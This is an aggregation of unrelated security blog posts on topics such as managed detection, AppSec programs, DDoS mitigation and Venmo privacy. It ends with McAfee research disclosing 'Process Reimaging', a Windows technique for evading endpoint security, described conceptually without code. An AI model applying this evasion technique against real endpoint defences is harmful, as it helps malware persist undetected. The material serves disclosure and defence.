While phony system cleaner apps have been common for many years, a recent study shows that user numbers for these apps has doubled from the same time last year to nearly 1.5 million. These apps often appear innocent and helpful at the outset, while others have begun taking an outright malicious approach. To make matters worse, these apps are commonly installed to fix the very issues they later create by slowing the computer down and causing annoying popups. 

The post Cyber News Rundown: GPS Vulnerabilities in Tesla Vehicles appeared first on Webroot Blog.

How organisations can effectively manage, detect and respond to a data breach?

Guest article by Andy Pearch, Head of IA Services at CORVID

78% of businesses cite cyber security as a high priority for their organisation’s senior management. Whilst it is encouraging that this figure has risen year on year, generating awareness of cyber security is only one part of the issue. The next step for organisations to take is not only understanding, but intelligently acting on the risks presented. Despite the heightened awareness, many organisations are still focusing on mitigating assumed risks, rather than real risks, without a robust security strategy in place.

Whilst perimeter security is a key part of any organisation’s security posture, the fact is that it cannot work in isolation. Data breaches are now commonplace and largely regarded as inevitable, and the rise of new technologies means that today’s threats have increased in sophistication. As Andy Pearch, Head of IA Services at CORVID, explains, safeguarding data integrity, confidentiality and availability should be fundamental to all cyber security strategies. After all, it is the speed with which a breach is detected and the effectiveness with which it is remediated that will provide the most value – this can be achieved with a strategic Managed Detection and Response solution.

Unidentified attacks The Government’s Cyber Security Breaches Survey 2019 revealed that in the last 12 months alone, almost one third of UK businesses identified cyber security breaches or attacks. What’s more, the research also showed that just under half of these companies identified at least one breach or attack per month. While these figures should be enough to make a business refocus its strategic security thinking, it is the use of the word ‘identified’ that is significant: many more attacks could have occurred, but not yet been discovered.

Indeed, global figures reveal that the median dwell time – the time a criminal can be on a company’s network undetected – is over 100 days. And in many cases, the breach is not revealed by the security team itself; it is a call from a supplier, a customer or business partner that brings the problem to light, typically following the receipt of a diversion fraud email requesting, for example, that future payments should be sent to a different bank account.

These breaches not only have the ability to undermine business relationships, but in some cases, can also incur significant financial liability. These frauds usually follow one of two forms: either impersonation, where a criminal masquerades as the business using a very similar domain name and email address, or following a successful compromise, the email comes from the company’s own system. It is the latter case that raises the issue of liability for any financial losses a business partner may have suffered.

Asking the tough questions
Alongside phishing attacks, this approach to cyber attacks completely bypasses the traditional cyber security methods, such as anti-virus (AV) software and firewalls, upon which so many companies still rely. Indeed, while 80% of businesses cite phishing attacks as the cause of breach, 28% confirm the cause was the impersonation of an organisation in emails or online. Only 27% cite viruses, spyware or malware, including ransomware attacks, as the root cause of the breach.

Many companies still depend on perimeter security, and for those that do, it is time to ask some serious questions. Firstly, can you be 100% confident that your business has not been compromised? How would you know if the attacker has not used malware or a virus that would be picked up by the perimeter defences? Secondly, even when a compromise is identified, many companies aren’t sure what the next steps should be. If a supplier makes the call to reveal the business has been compromised, can you confidently identify where that occurred? What part of the business has been affected? What is the primary goal of the attack? Is the attacker only leveraging a compromised email system to defraud customers, or aiming to gain intellectual property or personal data?

The GDPR has demonstrated that the risk associated with a cyber attack is not only financial, as hackers are also actively seeking to access personal information. Security plans, therefore, must also consider data confidentiality, integrity and availability. But it is also essential for organisations to accept that protection is not a viable option given today’s threat landscape: a fundamental shift in security thinking is required. When hackers are using the same tactics and tools as genuine users, preventing these attacks is impossible. Rapid detection and remediation must be the priority.

Removing the burden
Managed Detection and Response (MDR) enables an organisation to spot the unusual activity that indicates a potential breach. For example, if a user is accessing files they would never usually open or view, sending unexpected emails or reaching out to a new domain, such activity should prompt a review. The problem for most companies, however, is they lack not only the tools to detect this activity but also the time and skills to analyse whether it is a breach or actually a false positive.

A managed approach not only takes the burden away from the business, but also enables every company to benefit from the pool of knowledge gathered by detecting and remediating attacks on businesses across the board. With MDR, every incident detected is investigated and, if it’s a breach, managed. That means shutting down the attack’s communication channel to prevent the adversary communicating with the compromised host, and identifying any compromised assets – this can then either be remediated in-house, if preferred, or as part of the MDR service.

Information relating to the mode of attack is also collected. This timely, actionable intelligence is immediately applied to the MDR service, creating either a prevention or detection technique to minimise the chance of this approach succeeding again. Because of this, the speed with which attacks can now be detected is compelling: whilst the average dwell time has continued to decrease in recent years, it is now entirely possible for unknown malware to be detected and nullified within the hour.

Reflect and act
The threat landscape is continuously evolving – it’s important for organisations to recognise this and match security strategies to the true level of risk. What’s more, whilst the increased commitment to security at a Board level is encouraged, organisations cannot equate expenditure with effectiveness.

Organisations must reflect and consider not only the consequences of data loss, but of integrity and availability too. Security strategies can no longer rely on users not making mistakes; when a breach occurs, an organisation must know what happened.

Security strategies cannot afford to stand still. With the rise in phishing and diversion fraud, it is not enough for organisations to simply lock down the perimeter. Companies cannot prevent all attacks, but when a compromise occurs, it is essential to understand how, when and why the attack succeeded so the appropriate response can be determined, and learnings can be applied for the future. It is only with this process in place that organisations can safeguard their business, data and reputation.

Weekly Update 144

Weekly Update 144

So first things first - my patience for the Instamics we're wearing just reached zero. One of them recorded and one of them didn't which means we've had to fallback to audio captured by the iPhone I was recording from so apologies it's sub-par. I ended up just uploading the unedited clip direct from the phone because frankly, after trying to recover the non-existent audio both my time and patience were well into the red.

Be that as it may, there's video, audio and a narrative to tell both around the NDC event Scott and I are at and the progress of "Project Svalbard". I'm trying to share as much as I can about that process as things progress and I hope people appreciate the transparency I've always run HIBP with. As I say in the video, if you've got questions about it then drop them in the comments section below.

Weekly Update 144
Weekly Update 144
Weekly Update 144

References

  1. Scott wrote about maintaining state in a Cloudflare worker (this is a fundamental part of how we're able to process 670M reports a day!)
  2. Check out how much HIBP trended in searches in January (yes, that's a direct map to my stress levels and yes, I will send stickers to anyone who creates that site I mentioned!)
  3. Project Svalbard is forging ahead (it's becoming increasingly demanding, but it's also a very exciting time)
  4. Varonis is sponsoring my blog again this week (check out their Varonis DFIR team investigating a cyberattack using their data-centric security stack)

Beware! Email attachments can make you victim of spear phishing attacks

In the last few months, we’ve seen a sudden increase in Spear Phishing attacks. Spear phishing is a variation of a phishing scam wherein hackers send a targeted email to an individual which appears to be from a trusted source. In this type of attack, the attacker uses social engineering tricks and some…

Live From Gartner Security & Risk Mgmt Summit: Starting an AppSec Program, Part 2

This is part two of a two-part blog series on a presentation by Hooper Kincannon, Cyber Security Engineer at Unum Group, on “Secure from the Start: A Case Study on Software Security” at the Gartner Security & Risk Management Summit in National Harbor, MD. In this presentation, Hooper provided a great blueprint for starting a DevSecOps program. In part one, I summarized how Hooper got buy-in for his program and his overall plan for the initiative. In this blog, we delve into the details.

Using Different Assessment Types for the Right Purpose

Hooper kindly shared his slides with us. Here is his helpful comparison of different assessment types, focusing on static analysis, dynamic analysis and manual penetration testing:

You have to make a choice which route you’d like to take. In Hooper’s case, he decided to build static and dynamic application security into the SDLC.

Dynamic and Static Analysis Workflow

For dynamic analysis testing, Hooper recommeds the following workflow:

To make your DAST assessments successful, he recommended using a consistent scan duration, considering the various authentication mechanisms, and using the testing credentials only for testing.

For static analysis testing, he recommended the following workflow:

His recommendations for static analysis testing included being conscious of how you define applications, being aware of compilation instructions, and consistency of the process.

Understanding Remediation vs. Mitigation

After you have identified a vulnerability, you can address it in two different ways:

  • Remediation: Fixing the security defect by changing the code that contains the defect or making a configuration change. This eliminates the risk.
  • Mitigation: Implementing controls to make it less likely that the vulnerability is exploited. This reduces the risk but does not eliminate it because the vulnerability is still present in the code.

Working With Scanning Results

How you use your scan results can make or break your program. If you’re fortunate, you’ll scan your application and get back a low volume of flaws. If you’re unlucky, it may be the opposite.

Hooper’s biggest recommendation is not to panic: The overall goal is to reduce risk, and that won’t happen overnight. Take your time to digest the results and discuss how to best prioritize them. For example, consider fixing dynamic results first because they are easier to discover by an attacker. Decide what you accept as trusted sources, especially in the case of input validation, and have a process for handling exceptions, such as acceptable risk, mitigations, and false positives. Hooper recommends that you do a readout of the results with the stakeholders.

Picking the Right Metrics to Report On

Metrics are probably the most important deliverable coming out of your program. Security is a difficult metric to measure; reduction in risk is a bit easier.

Metrics that worked for Hooper are:

  • Flaw density
  • Risk reduced (vulnerability severity reduced)
  • Most common flaw types (use to guide education efforts)
  • Compliance over time
  • Onboarding time + other operation metrics

When presenting to the different stakeholders of the program, be aware of what each constituency is interested in – because it varies:

  • CISO + senior management: Profitability of the investment
  • Business leaders: Resource allocation
  • Development: Staying on top of flaws

Keeping a regular cadence is vital. Hooper has made these activities part of his program:

  • Monthly scorecards
  • Monthly executive dashboards
  • Annual reviews
  • Real-time dashboards for developers

Optimizing the Program in Year Two

One year after starting the program, Hooper had reached success with external high-risk applications. Next, he moved on to internal high-risk applications. In addition, he started to automate more and more of the program to make it repeatable and easier to manage. For most organizations, he recommends starting out with automation from day one, but even if you start out manually, you’re taking a step in the right direction.

Here is a picture of how Unum Group integrates Veracode into their SDLC:

For More Information

If you’re interested in starting your own application security program, read our take on Everything You Need To Know About Getting Application Security Buy-In.

Live From Gartner Security & Risk Mgmt Summit: Starting a Web Application Security Program

Bootstrapping an application security program is hard. Technology is only one part of the equation. You need to inventory your applications, get stakeholders on board, and then execute on the holy trinity of people, process, and technology. That’s why I was excited to see Hooper Kincannon, Cyber Security Engineer at Unum Group, present on “Secure from the Start: A Case Study on Software Security” at the Gartner Security & Risk Management Summit in National Harbor, MD. Hooper provided a great blue print for starting a DevSecOps program.

Sixty Vulnerabilities Are Reported Every Day, 27 Percent Are Never Fixed

Hooper began his presentation by outlining the current state of both software, and software security. He points out that while software is changing the world, it is also fundamentally flawed from a security perspective.

He points to some highlights from a study by Risk Based Security:

  • More than 22,000 vulnerabilities were disclosed in 2018 – that’s about 60 per day.
  • Almost a third of these (27%) were never fixed, so security professionals can’t just deploy a patch to improve their security posture.
  • Web-related vulnerabilities accounted for nearly half of all reported security flaws, and more than two thirds were related to insufficient or improper validation of input.
  • 33% received a severity rating of seven or above.
  • OWASP Top 10 still account for two-thirds of the reported vulnerabilities.

What can we do about it? We can develop a secure software development lifecycle and try to stem the flow of the vulnerabilities being published in the first place. This is becoming increasingly difficult because more lines of code are be written than ever before (111 billion lines of code in 2016, trending up).

Software Is Becoming Mission Critical: Making the Case for AppSec

So what if Alexa won’t work or my app crashes? Both would probably only be minor annoyances, but software is also impacting us on a much larger scale. Not too long ago, people would be lucky if they had only a two-minute warning that a tornado was coming. Today, weather monitoring and modeling software can predict the formation and path of a tornado with stunning accuracy. And better still they can send text messages to those in danger – providing precious minutes to find shelter.

Farming is being transformed by software as well. Software monitors the moisture levels in soil, and irrigation systems connected to these sensors release the optimal amount of water into the soil. This way, the crops have what they need to grow, and not a drop of water is wasted. There are technologies that monitor crop growth and health and even harvest crops. In other words, software is tackling world hunger. That’s something worth protecting.

When you want to demonstrate to your stakeholders why application security is important to your organization, go back to your company’s mission and ladder up your argument to this ultimate goal. Unum offers disability, life and financial protection to its customers. If your mission is to help people at their most vulnerable moments in life, you need to ensure that they don’t have to worry about their identity being stolen as the result of a data breach in addition to having to figure out medical payments. Making this connection with the core mission can really help tell a story of why application security is crucial to the business.

Starting Out With the Right Questions

Before you can dive head first into your DevSecOps program, you need to ask yourself the right questions:

  • Do you know your application portfolio?
  • Do you have web application security policies defined?
  • Who is responsible for the web application security program?
  • Who is going to fund the program?
  • What is your goal?

Only once you have answered these questions will you be able to find the right formula for your organization. Hooper laid out his program in the rest of the talk, but your organization may differ, so make sure that you ask these questions at the outset.

Building a DevSecOps Program from Scratch

Hooper started at Unum about three years ago as a member of their threat and vulnerability management team. At that point in time, they didn’t have a true web application security program, but they had a relationship with Veracode to assess their top-tier applications, and they were doing basic dynamic analysis with another vendor. At that point, Hooper was fortunate enough to get funding to help expand and mature the program. 

Unum’s primary goal was to reduce risk, so he set out to discover and rate the risk of all of their applications. He helped define security policies for all web applications, including expectations and remediation SLAs. They also decided that security should be responsible for the administration of the AppSec program, and development would cover remediation. 

Hooper chose to expand his relationship with Veracode, covering SAST, DAST, SCA, and eLearning. He also partnered with Veracode to provide live trainings for developers, and signed up for their program management and application security consulting services, which help onboard scrum teams and help developers fix security defects if they get stuck.

In a follow-up blog, we will delve into the details of Hooper’s AppSec program and his path to AppSec maturity.

Blocking DDoS Attacks Using Automation

Guest article by Adrian Taylor, Regional Vice President at A10 Networks

DDoS attacks can be catastrophic, but the right knowledge and tactics can drastically improve your chances of successfully mitigating attacks. In this article, we’ll explore the five ways, listed below, that automation can significantly improve response times during a DDoS attack while assessing the means to block such attacks.

Response time is critical for every enterprise because, in our hyper-connected world, DDoS attacks cause downtime, and downtime means money lost. The longer your systems are down, the more your profits will sink.

Let’s take a closer look at all the ways that automation can put time on your side during a DDoS attack. But first, let’s clarify just how much time an automated defence system can save.

Automated vs. Manual Response Time
Sure, automated DDoS defence is faster than manual DDoS defence, but by how much?

Founder and CEO of NimbusDDoS Andy Shoemaker recently conducted a study to find out. The results spoke volumes: automated DDoS defence improves attack response time five-fold.

The average response time using automated defence was just six minutes, compared to 35 minutes using manual processes, a staggering 29-minute difference. In some cases, the automated defence was even able to eliminate response time completely.

An automated defence system cuts down on response time in five major ways. Such systems can:

  • Instantly detect incoming attacks: Using the data it has collected during peace time, an automated DDoS defence system can instantly identify suspicious traffic that could easily be missed by human observers.
  • Redirect traffic accordingly: In a reactive deployment, once an attack has been detected, an automated DDoS defence system can redirect the malicious traffic to a shared mitigation scrubbing center – no more manual BGP routing announcements of suspicious traffic.
  • Apply escalation mitigation strategies: During the attack’s onslaught of traffic, an automated DDoS defence system will take action based on your defined policies in an adaptive fashion while minimising collateral damage to legitimate traffic.
  • Identify patterns within attack traffic: By carefully inspecting vast amounts of attack traffic in a short period of time, an automated DDoS defence system can extract patterns in real-time to block zero-day botnet attacks.
  • Apply current DDoS threat intelligence: An automated DDoS defence system can access real-time, research-driven IP blocklists and DDoS weapon databases and apply that intelligence to all network traffic destined for the protected zone.
An intelligent automated DDoS defence system doesn’t stop working after an attack, either. Once the attack has been successfully mitigated, it will generate detailed reports you and your stakeholders can use for forensic analysis and for communicating with other stakeholders.

Although DDoS attackers will never stop innovating and adapting, neither will automated and intelligent DDoS protection systems.

By using an automated system to rapidly identify and mitigate threats with the help of up-to-date threat intelligence, enterprises can defend themselves from DDoS attacks as quickly as bad actors can launch them.

Three key strategies to block DDoS attacks
While it’s crucial to have an automated system in place that can quickly respond to attacks, it’s equally important to implement strategies that help achieve your goal of ensuring service availability to legitimate users.

After all, DDoS attacks are asynchronous in nature: You can’t prevent the attacker from launching an attack, but with three critical strategies in place, you can be resilient to the attack, while protecting your users.

Each of the three methods listed below is known as a source-based DDoS mitigation strategy. Source-based strategies implement cause as a basis for choosing what traffic to block. The alternative of destination-based mitigation relies on traffic shaping to prevent the system from falling over.

While destination traffic shaping is effective in preserving system health from being overwhelmed during an attack, it is equally fraught with indiscriminate collateral damage to legitimate users.

Tracking deviation: A tracking deviation strategy works by observing traffic on an ongoing basis to learn what qualifies as normal and what represents a threat.
  • Specifically, a defence system can analyse data rate or query rate from multiple characteristics (e.g. BPS, PPS, SYN-FIN ratio, session rate, etc.) to determine which traffic is legitimate and which is malicious or may identify bots or spoofed traffic by their inability to answer challenge questions.
Pattern recognition: A pattern recognition strategy uses machine learning to parse unusual patterns of behaviour commonly exhibited by DDoS botnets and reflected amplification attacks in real time.
  • For example, DDoS attacks are initiated by a motivated attacker that leverages an orchestration platform providing the distributed weapons with instructions on how to flood the victim with unwanted traffic. The common command and control (C&C) and distributed attack exhibit patterns that can be leveraged as a causal blocking strategy.
Reputation: To utilise reputation as a source-based blocking strategy, a DDoS defence system will use threat intelligence provided by researchers of DDoS botnet IP addresses, in addition to tens of millions of exposed servers used in reflected amplification attacks.
  • The system will then use that intelligence to block any matching IP addresses during an attack.
Any of these three source-based DDoS mitigation strategies requires more computing capabilities than indiscriminate destination protection.

They do, however, have the significant advantage of being able to prevent legitimate users from being blocked, thereby reducing downtime and preventing unnecessarily lost profits.

Knowing that, it’s safe to say that these three mitigation strategies are all well worth the investment.

Adrian Taylor, Regional Vice President at A10 Networks

Process Reimaging: A Cybercrook’s New Disguise for Malware

As of early 2019, Windows 10 is running on more than 700 million devices, including PCs, tablets, phones, and even some gaming consoles. However, it turns out the widespread Windows operating system has some inconsistencies as to how it specifically determines process image file locations on disk. Our McAfee Advanced Threat Research team decided to analyze these inconsistencies and as a result uncovered a new cyberthreat called process reimaging. Similar to process doppelganging and process hollowing, this technique evades security measures, but with greater ease since it doesn’t require code injection. Specifically, this technique affects the ability for a Windows endpoint security solution to detect whether a process executing on the system is malicious or benign, allowing a cybercrook to go about their business on the device undetected.

Let’s dive into the details of this threat. Process reimaging leverages built-in Windows APIs, or application programming interfaces, which allow applications and the operating system to communicate with one another. One API dubbed K32GetProcessImageFileName allows endpoint security solutions, like Windows Defender, to verify whether an EXE file associated with a process contains malicious code. However, with process reimaging, a cybercriminal could subvert the security solution’s trust in the windows operating system APIs to display inconsistent FILE_OBJECT names and paths. Consequently, Windows Defender misunderstands which file name or path it is looking at and can no longer tell if a process is trustworthy or not. By using this technique, cybercriminals can persist malicious processes executing on a user’s device without them even knowing it.

So, the next question is — what can Windows users do to protect themselves from this potential threat? Check out these insights to help keep your device secure:

  • Update your software. Microsoft has issued a partial fix that stops cybercriminals from exploiting file names to disguise malicious code, which helps address at least part of the issue for Windows Defender only. And while file paths are still viable for exploitation, it’s worth updating your software regularly to ensure you always have the latest security patches, as this is a solid practice to work into your cybersecurity routine.
  • Work with your endpoint security vendor. To help ensure you’re protected from this threat, contact your endpoint security provider to see if they protect against process reimaging.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Process Reimaging: A Cybercrook’s New Disguise for Malware appeared first on McAfee Blogs.

The evolution of Microsoft Threat Protection, June update

Since our announcement of Microsoft Threat Protection at Microsoft Ignite, our goal has been to execute and deliver on our promise of helping organizations protect themselves from today’s sophisticated and complex threat landscape. As we close out our fiscal year, we’ve continued progress on developing Microsoft Threat Protection, launching new capabilities and services. Hopefully, you’ve had a chance to follow our monthly updates.

As we previously shared, Microsoft Threat Protection enables your organization to:

This month, we want to share new capabilities that are starting public previews.

Efficient remediation and response for identity threats

Presently, efficient and effective response to identity threats is crucial, and Microsoft Threat Protection is built on the industry’s most widely used and comprehensive identity security service. As more organizations adopt hybrid environments, data is spread across multiple applications, is on-premises and in the cloud, and is accessed by multiple devices (often personal devices) and users. Most organizations no longer have a defined network perimeter, making traditional security tools obsolete. Identity is the control plane that is consistent across all elements of the modern organization.

At RSA, we announced a new unified Identity Threat Investigation experience between Azure Active Directory (Azure AD) Identity Protection, Azure Advanced Threat Protection (ATP), and Microsoft Cloud App Security. This experience will go into public preview this month.

Part of the new experience is enabled through Azure AD’s new integration with Azure ATP. Also, integration between Azure AD and Microsoft Cloud App Security enables continuous monitoring of user behavior from sign-in through the entire session. Microsoft Threat Protection’s identity services leverage user behavior analytics to create a dynamic investigation priority score (Figure 1) based off signal from Azure AD, Microsoft Cloud App Security, and Azure ATP. The investigation priority is calculated by assessing security alerts, abnormal activities, and potential business and asset impact related to each user. This score can help Security Operations (SecOps) teams focus and respond to the top user threats in the organization.

Figure 1. The investigation priority view.

To learn more, read Investigating identity threats in hybrid cloud environments.

Game-changing capabilities for endpoint security

Every month, Microsoft Threat Protection detects over 5 billion endpoint threats through its Microsoft Defender ATP service. Customers have long asked us to extend our industry-leading endpoint security beyond the Windows OS. This was a major driving force for us to deliver endpoint security natively for macOS in limited preview earlier this year. We’re excited to announce that Microsoft Defender ATP for macOS is in public preview.

Microsoft Threat Protection customers who have turned on the Microsoft Defender ATP preview features can access Microsoft Defender ATP for Mac via the onboarding section in the Microsoft Defender Security Center. For more information and resources, including system requirements, prerequisites, and a list of improvements and new features, check out the Microsoft Defender ATP for Mac documentation.

To further enhance your endpoint security, “live response,” our new incident response action for SecOps teams, is currently in public preview. Today, your employees often work beyond the corporate network boundary, whether from home or while traveling. The risk for compromise is potentially higher when a user is remote. Imagine the executive who connects their laptop to hotel Wi-Fi and is compromised. With current endpoint security services, SecOps would need to wait until the executive got back to the office, leaving a high-value laptop exposed. With our new live response, SecOps teams gain instant access to a compromised machine regardless of location, as well as the ability to gather any required forensic information.

This powerful feature allows you to:

  • Gather a snapshot of connections, drivers, scheduled tasks, and services, as well as search for specific files or request file analysis to reach a verdict (clean, malicious, or suspicious).
  • Download malware files for reverse-engineering.
  • Create a tenant-level library of forensic tools like PowerShell scripts and third-party binaries that allows SecOps to gather forensic information like the MFT table, firewall logs, event logs, process memory dumps, and more.
  • Run remediation activities such as quarantine file, stop process, remove registry, remove scheduled task, and more.

To learn more, try the live response DIY or read Investigate entities on machines using live response.

Figure 2. Run remediation commands.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection, read our previous monthly updates, and visit the Microsoft Threat Protection webpage. Organizations, like Telit, have already transitioned to Microsoft Threat Protection and our partners are also leveraging its powerful capabilities.

Begin a trial of Microsoft Threat Protection services, which also includes our newly launched SIEM, Azure Sentinel, to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

The post The evolution of Microsoft Threat Protection, June update appeared first on Microsoft Security.

3 Tips Venmo Users Should Follow to Keep Their Transactions Secure

You’ve probably heard of Venmo, the quick and convenient peer-to-peer mobile payments app. From splitting the check when eating out with friends to dividing the cost of bills, Venmo is an incredibly easy way to share money. However, users’ comfort with the app can sometimes result in a few negligent security practices. In fact, computer science student Dan Salmon recently scraped seven million Venmo transactions to prove that users’ public activity can be easily obtained if they don’t have the right security settings flipped on. Let’s explore his findings.

By scraping the company’s developer API, Salmon was able to download millions of transactions across a six-month span. That means he was able to see who sent money to who, when they sent it, and why – just as long as the transaction was set to “public.” Mind you, Salmon’s download comes just a year after that of a German researcher, who downloaded over 200 million transactions from the public-by-default app last year.

These data scrapes, if anything, act as a demonstration. They prove to users just how crucial it is to set up online mobile payment apps with caution and care. Therefore, if you’re a Venmo or other mobile payment app user, make sure to follow these tips in order to keep your information secure:

  • Set your settings to “private” immediately. Only the sender and receiver should know about a monetary transaction in the works. So, whenever you go to send money on Venmo or any other mobile payment app, make sure the transaction is set to “private.” For Venmo users specifically, you can flip from “public” to “private” by just toggling the setting at the bottom right corner of main “Pay or Request” page.
  • Limit the amount of data you share. Just because something is designed to be social doesn’t mean it should become a treasure trove of personal data. No matter the type of transaction you’re making, always try to limit the amount of personal information you include in the corresponding message. That way, any potential cybercriminals out there won’t be able to learn about your spending habits.
  • Add on extra layers of security. Beyond flipping on the right in-app security settings, it’s important to take any extra precautions you can when it comes to protecting your financial data. Create complex logins to your mobile payment apps, participate in biometric options if available, and ensure your mobile device itself has a passcode as well. This will all help ensure no one has access to your money but you.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 3 Tips Venmo Users Should Follow to Keep Their Transactions Secure appeared first on McAfee Blogs.

Why Process Reimaging Matters

As this blog goes live, Eoin Carroll will be stepping off the stage at Hack in Paris having detailed the latest McAfee Advanced Threat Research (ATR) findings on Process Reimaging.  Admittedly, this technique probably lacks a catchy name, but be under no illusion the technique is significant and is worth paying very close attention to.

Plain and simple, the objective of malicious threat actors is to bypass endpoint security. It is this exact game of cat and mouse that the security industry has been playing with malware writers for years, and one that, quite frankly, will continue. This ongoing battle will shape the future of cyber, and drive innovation in attack techniques and the ways in which we defend against them.  As part of this process it is crucial that we, the McAfee ATR team, continually identify techniques that could be used by malicious actors successfully.  It is this work that has led to the identification of a technique we call Process Reimaging, which was successful in bypassing endpoint security solutions (ESSs). To be clear, our objective is to stay ahead of malicious actors in identifying evasion techniques, with the broader goal of providing a safer computing environment for all organizations.

This technique is detailed by Eoin in a comprehensive technical blog titled In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass. The following is a summary of the findings.

Process Reimaging targets non-EDR ESSs.  It’s a post exploitation technique, meaning it targets users who have already fallen victim, for example to a phishing or a drive-by-download attack, so that the process can execute undetected and dwell on an endpoint for an significant period of time. The Windows kernel exports functionality to support the user mode components of ESSs which they depend on for protection and detection capabilities. There are numerous APIs such as K32GetProcessImageFileName that allows the ESSs “to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure.” It was this functionality that our research focused on since the APIs return stale and inconsistent FILE_OBJECT paths, this potentially allows a malicious actor to bypass the process attribute verification undertaken by the Windows Operating System.   To be more precise, this allowed McAfee ATR to develop a proof-of-concept that was not detected by Windows Defender and will not be detected until a signature is created to block the file on disk before the process itself is created or a full scan is executed.

It is because the ESS relies on the Windows operating system to verify the process attributes that this technique is actually successful.  Whereby the ESS will naturally trust a particular process with a non-malicious file on disk since it makes the assumption that the O/S has verified the correct file on disk associated with that process, for the ESS to scan.

Releasing details of the technique

With the public release of security research, there is always a significant risk that any released information can be utilized by adversaries for nefarious activities. The balance of security research versus irresponsible disclosure is an issue we continually wrestle with, and these findings are no different. In the process of conducting due diligence, we were able to identify the use of Process Doppelganging with Process Hollowing as its fallback defense evasion technique within the SynAck ransomware in 2018.  Since Process Doppelganging technique was weaponized within SynAck ransomware less than five months after it’s disclosure at Blackhat Europe in 2017, we can only assume that the Process Reimaging technique itself is, or rather will be close to usage by threat actors to bypass detection.

The post Why Process Reimaging Matters appeared first on McAfee Blogs.

In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass

Process Reimaging Overview

The Windows Operating System has inconsistencies in how it determines process image FILE_OBJECT locations, which impacts non-EDR (Endpoint Detection and Response) Endpoint Security Solution’s (such as Microsoft Defender Realtime Protection), ability to detect the correct binaries loaded in malicious processes. This inconsistency has led McAfee’s Advanced Threat Research to develop a new post-exploitation evasion technique we call “Process Reimaging”. This technique is equivalent in impact to Process Hollowing or Process Doppelganging within the Mitre Attack Defense Evasion Category; however, it is , much easier to execute as it requires no code injection. While this bypass has been successfully tested against current versions of Microsoft Windows and Defender, it is highly likely that the bypass will work on any endpoint security vendor or product implementing the APIs discussed below.

The Windows Kernel, ntoskrnl.exe, exposes functionality through NTDLL.dll APIs to support User-mode components such as Endpoint Security Solution (ESS) services and processes. One such API is K32GetProcessImageFileName, which allows ESSs to verify a process attribute to determine whether it contains malicious binaries and whether it can be trusted to call into its infrastructure. The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths, which enable an adversary to bypass Windows operating system process attribute verification. We have developed a proof-of-concept which exploits this FILE_OBJECT location inconsistency by hiding the physical location of a process EXE.

The PoC allowed us to persist a malicious process (post exploitation) which does not get detected by Windows Defender.

The Process Reimaging technique cannot be detected by Windows Defender until it has a signature for the malicious file and blocks it on disk before process creation or performs a full scan on suspect machine post compromise to detect file on disk. In addition to Process Reimaging Weaponization and Protection recommendations, this blog includes a technical deep dive on reversing the Windows Kernel APIs for process attribute verification and Process Reimaging attack vectors. We use the SynAck Ransomware as a case study to illustrate Process Reimaging impact relative to Process Hollowing and Doppelganging; this illustration does not relate to Windows Defender ability to detect Process Hollowing or Doppelganging but the subverting of trust for process attribute verification.

Antivirus Scanner Detection Points

When an Antivirus scanner is active on a system, it will protect against infection by detecting running code which contains malicious content, and by detecting a malicious file at write time or load time.

The actual sequence for loading an image is as follows:

  • FileCreate – the file is opened to be able to be mapped into memory.
  • Section Create – the file is mapped into memory.
  • Cleanup – the file handle is closed, leaving a kernel object which is used for PAGING_IO.
  • ImageLoad – the file is loaded.
  • CloseFile – the file is closed.

If the Antivirus scanner is active at the point of load, it can use any one of the above steps (1,2 and 4) to protect the operating system against malicious code. If the virus scanner is not active when the image is loaded, or it does not contain definitions for the loaded file, it can query the operating system for information about which files make up the process and scan those files. Process Reimaging is a mechanism which circumvents virus scanning at step 4, or when the virus scanner either misses the launch of a process or has inadequate virus definitions at the point of loading.

There is currently no documented method to securely identify the underlying file associated with a running process on windows.

This is due to Windows’ inability to retrieve the correct image filepath from the NTDLL APIs.  This can be shown to evade Defender (MpMsEng.exe/MpEngine.dll) where the file being executed is a “Potentially Unwanted Program” such as mimikatz.exe. If Defender is enabled during the launch of mimikatz, it detects at phase 1 or 2 correctly.  If Defender is not enabled, or if the launched program is not recognized by its current signature files, then the file is allowed to launch. Once Defender is enabled, or the signatures are updated to include detection, then Defender uses K32GetProcessImageFileName to identify the underlying file. If the process has been created using our Process Reimaging technique, then the running malware is no longer detected. Therefore, any security service auditing running programs will fail to identify the files associated with the running process.

Subverting Trust

The Mitre ATT&CK model specifies post-exploitation tactics and techniques used by adversaries, based on real-world observations for Windows, Linux and macOS Endpoints per figure 1 below.

Figure 1 – Mitre Enterprise ATT&CK

Once an adversary gains code execution on an endpoint, before lateral movement, they will seek to gain persistence, privilege escalation and defense evasion capabilities. They can achieve defense evasion using process manipulation techniques to get code executing in a trusted process. Process manipulation techniques have existed for a long time and evolved from Process Injection to Hollowing and Doppelganging with the objective of impersonating trusted processes. There are other Process manipulation techniques as documented by Mitre ATT&CK and Unprotect Project,  but we will focus on Process Hollowing and Process Doppelganging. Process manipulation techniques exploit legitimate features of the Windows Operating System to impersonate trusted process executable binaries and generally require code injection.

ESSs place inherent trust in the Windows Operating System for capabilities such as digital signature validation and process attribute verification. As demonstrated by Specter Ops, ESSs’ trust in the Windows Operating system could be subverted for digital signature validation.

Similarly, Process Reimaging subverts an ESSs’ trust in the Windows Operating System for process attribute verification.

When a process is trusted by an ESS, it is perceived to contain no malicious code and may also be trusted to call into the ESS trusted infrastructure.

McAfee ATR uses the Mitre ATT&CK framework to map adversarial techniques, such as defense evasion, with associated campaigns. This insight helps organizations understand adversaries’ behavior and evolution so that they can assess their security posture and respond appropriately to contain and eradicate attacks. McAfee ATR creates and shares Yara rules based on threat analysis to be consumed for protect and detect capabilities.

Process Manipulation Techniques (SynAck Ransomware)

McAfee Advanced Threat Research analyzed SynAck ransomware in 2018 and discovered it used Process Doppelganging with Process Hollowing as its fallback defense evasion technique. We use this malware to explain the Process Hollowing and Process Doppelganging techniques, so that they can be compared to Process Reimaging based on a real-world observation.

